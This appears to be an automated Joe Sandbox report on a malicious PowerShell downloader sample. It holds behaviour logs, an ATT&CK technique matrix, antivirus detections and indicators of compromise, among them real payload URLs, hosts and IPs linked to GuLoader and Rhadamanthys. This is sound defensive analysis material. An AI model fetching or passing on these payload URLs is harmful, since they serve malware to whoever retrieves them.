      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3933Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5875Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5236Thread sleep time: -13835058055282155s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
      Source: powershell.exe, 00000000.00000002.2272166981.000001CE1F395000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA
      Source: powershell.exe, 00000000.00000002.2272166981.000001CE1F395000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _VMware_SATA
      Source: powershell.exe, 00000000.00000002.2272166981.000001CE1F35D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: Yara matchFile source: amsi64_6736.amsi.csv, type: OTHER
      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6736, type: MEMORYSTR
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      PowerShell
      1
      Registry Run Keys / Startup Folder
      1
      Process Injection
      1
      Masquerading
      OS Credential Dumping1
      Security Software Discovery
      Remote Services1
      Archive Collected Data
      11
      Encrypted Channel
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/Job1
      DLL Side-Loading
      1
      Registry Run Keys / Startup Folder
      21
      Virtualization/Sandbox Evasion
      LSASS Memory1
      Process Discovery
      Remote Desktop ProtocolData from Removable Media3
      Ingress Tool Transfer
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
      DLL Side-Loading
      1
      Process Injection
      Security Account Manager21
      Virtualization/Sandbox Evasion
      SMB/Windows Admin SharesData from Network Shared Drive3
      Non-Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Obfuscated Files or Information
      NTDS1
      Application Window Discovery
      Distributed Component Object ModelInput Capture4
      Application Layer Protocol
      Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      DLL Side-Loading
      LSA Secrets2
      File and Directory Discovery
      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials11
      System Information Discovery
      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      fs8cRx6Us2.ps129%VirustotalBrowse
      fs8cRx6Us2.ps137%ReversingLabsScript-PowerShell.Trojan.PShell
      fs8cRx6Us2.ps1100%AviraTR/PShell.Dldr.VPA
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      https://alramsyadvocates.com/new/somt.exe0%Avira URL Cloudsafe
      https://www.alramsyadvocates.com/new/somt.exe0%Avira URL Cloudsafe
      http://www.bluemaxxlaser.com0%Avira URL Cloudsafe
      http://www.blut6fmaxxlast6fr.com/rh/List%20of%20rt6fquirt6fd%20itt6fms%20and%20st6frvict6fs.pdf0%Avira URL Cloudsafe
      https://www.alramsyadvocatt6fs.com/nt6fw/somt.t6fxt6fp0%Avira URL Cloudsafe
      http://www.alramsyadvocates.com0%Avira URL Cloudsafe
      https://www.alramsyadvocates.com0%Avira URL Cloudsafe
      https://alramsyadvocates.com0%Avira URL Cloudsafe
      http://alramsyadvocates.com0%Avira URL Cloudsafe
      http://www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdf0%Avira URL Cloudsafe
      https://www.alramsyadvocates.com/new/somt.exep0%Avira URL Cloudsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      alramsyadvocates.com
      103.120.48.75
      truefalse
        unknown
        www.bluemaxxlaser.com
        203.175.174.69
        truefalse
          high
          www.alramsyadvocates.com
          unknown
          unknownfalse
            unknown
            NameMaliciousAntivirus DetectionReputation
            https://www.alramsyadvocates.com/new/somt.exefalse
            • Avira URL Cloud: safe
            unknown
            http://www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdffalse
            • Avira URL Cloud: safe
            unknown
            NameSourceMaliciousAntivirus DetectionReputation
            http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.2267546136.000001CE16F3E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2267546136.000001CE17080000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              https://alramsyadvocates.com/new/somt.exepowershell.exe, 00000000.00000002.2251735403.000001CE085D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2251735403.000001CE085FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2251735403.000001CE085F8000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.2251735403.000001CE07103000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.2251735403.000001CE07103000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  https://go.micropowershell.exe, 00000000.00000002.2251735403.000001CE07B03000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    http://www.bluemaxxlaser.compowershell.exe, 00000000.00000002.2251735403.000001CE089EE000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://contoso.com/powershell.exe, 00000000.00000002.2267546136.000001CE17080000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.2267546136.000001CE16F3E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2267546136.000001CE17080000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://contoso.com/Licensepowershell.exe, 00000000.00000002.2267546136.000001CE17080000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://contoso.com/Iconpowershell.exe, 00000000.00000002.2267546136.000001CE17080000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://www.alramsyadvocates.compowershell.exe, 00000000.00000002.2251735403.000001CE085D7000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://www.alramsyadvocatt6fs.com/nt6fw/somt.t6fxt6fppowershell.exe, 00000000.00000002.2251735403.000001CE08503000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.blut6fmaxxlast6fr.com/rh/List%20of%20rt6fquirt6fd%20itt6fms%20and%20st6frvict6fs.pdfpowershell.exe, 00000000.00000002.2251735403.000001CE07103000.00000004.00000800.00020000.00000000.sdmp, fs8cRx6Us2.ps1true
                            • Avira URL Cloud: safe
                            unknown
                            https://aka.ms/pscore68powershell.exe, 00000000.00000002.2251735403.000001CE06ED1000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://www.alramsyadvocates.compowershell.exe, 00000000.00000002.2251735403.000001CE085D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2251735403.000001CE08503000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://alramsyadvocates.compowershell.exe, 00000000.00000002.2251735403.000001CE085D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2251735403.000001CE08613000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.2251735403.000001CE06ED1000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://alramsyadvocates.compowershell.exe, 00000000.00000002.2251735403.000001CE085FC000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.2251735403.000001CE07103000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://www.alramsyadvocates.com/new/somt.exeppowershell.exe, 00000000.00000002.2251735403.000001CE08503000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs
                                  IPDomainCountryFlagASNASN NameMalicious
                                  203.175.174.69
                                  www.bluemaxxlaser.comSingapore
                                  24482SGGS-AS-APSGGSSGfalse
                                  103.120.48.75
                                  alramsyadvocates.comBangladesh
                                  138023CREATION-AS-APCreationOnlineBDfalse
                                  Joe Sandbox version:41.0.0 Charoite
                                  Analysis ID:1578219
                                  Start date and time:2024-12-19 12:42:06 +01:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 4m 19s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:6
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:fs8cRx6Us2.ps1
                                  renamed because original name is a hash value
                                  Original Sample Name:f6e3224ac56171410ae0747b40a0be74bc0eab03f4200c215f60c75bcf1df84d.ps1
                                  Detection:MAL
                                  Classification:mal80.evad.winPS1@2/5@3/2
                                  EGA Information:Failed
                                  HCA Information:
                                  • Successful, ratio: 100%
                                  • Number of executed functions: 4
                                  • Number of non-executed functions: 6
                                  Cookbook Comments:
                                  • Found application associated with file extension: .ps1
                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                  • Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.175.87.197
                                  • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                  • Execution Graph export aborted for target powershell.exe, PID 6736 because it is empty
                                  • Not all processes where analyzed, report is missing behavior information
                                  TimeTypeDescription
                                  06:43:00API Interceptor43x Sleep call for process: powershell.exe modified
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  203.175.174.69ER4HMMzeQ3.ps1Get hashmaliciousUnknownBrowse
                                  • www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdf
                                  FjfZ7uM8zh.lnkGet hashmaliciousUnknownBrowse
                                  • www.bluemaxxlaser.com/ms/ms.vbs
                                  yswmdaREME.lnkGet hashmaliciousUnknownBrowse
                                  • www.bluemaxxlaser.com/ms/ms.vbs
                                  0bNBLjPn56.lnkGet hashmaliciousUnknownBrowse
                                  • www.bluemaxxlaser.com/ms/ms.vbs
                                  64Tgzu2FKh.exeGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                  • bluemaxxlaser.com/rh/rheu.bin
                                  zp.exeGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                  • bluemaxxlaser.com/rh/rh.bin
                                  eua.ps1Get hashmaliciousGuLoaderBrowse
                                  • www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdf
                                  zp.ps1Get hashmaliciousUnknownBrowse
                                  • www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdf
                                  zk.ps1Get hashmaliciousUnknownBrowse
                                  • www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdf
                                  mx.ps1Get hashmaliciousUnknownBrowse
                                  • www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdf
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  www.bluemaxxlaser.comER4HMMzeQ3.ps1Get hashmaliciousUnknownBrowse
                                  • 203.175.174.69
                                  FjfZ7uM8zh.lnkGet hashmaliciousUnknownBrowse
                                  • 203.175.174.69
                                  yswmdaREME.lnkGet hashmaliciousUnknownBrowse
                                  • 203.175.174.69
                                  0bNBLjPn56.lnkGet hashmaliciousUnknownBrowse
                                  • 203.175.174.69
                                  eua.ps1Get hashmaliciousGuLoaderBrowse
                                  • 203.175.174.69
                                  zp.ps1Get hashmaliciousUnknownBrowse
                                  • 203.175.174.69
                                  zk.ps1Get hashmaliciousUnknownBrowse
                                  • 203.175.174.69
                                  mx.ps1Get hashmaliciousUnknownBrowse
                                  • 203.175.174.69
                                  as.ps1Get hashmaliciousGuLoaderBrowse
                                  • 203.175.174.69
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  SGGS-AS-APSGGSSGER4HMMzeQ3.ps1Get hashmaliciousUnknownBrowse
                                  • 203.175.174.69
                                  FjfZ7uM8zh.lnkGet hashmaliciousUnknownBrowse
                                  • 203.175.174.69
                                  yswmdaREME.lnkGet hashmaliciousUnknownBrowse
                                  • 203.175.174.69
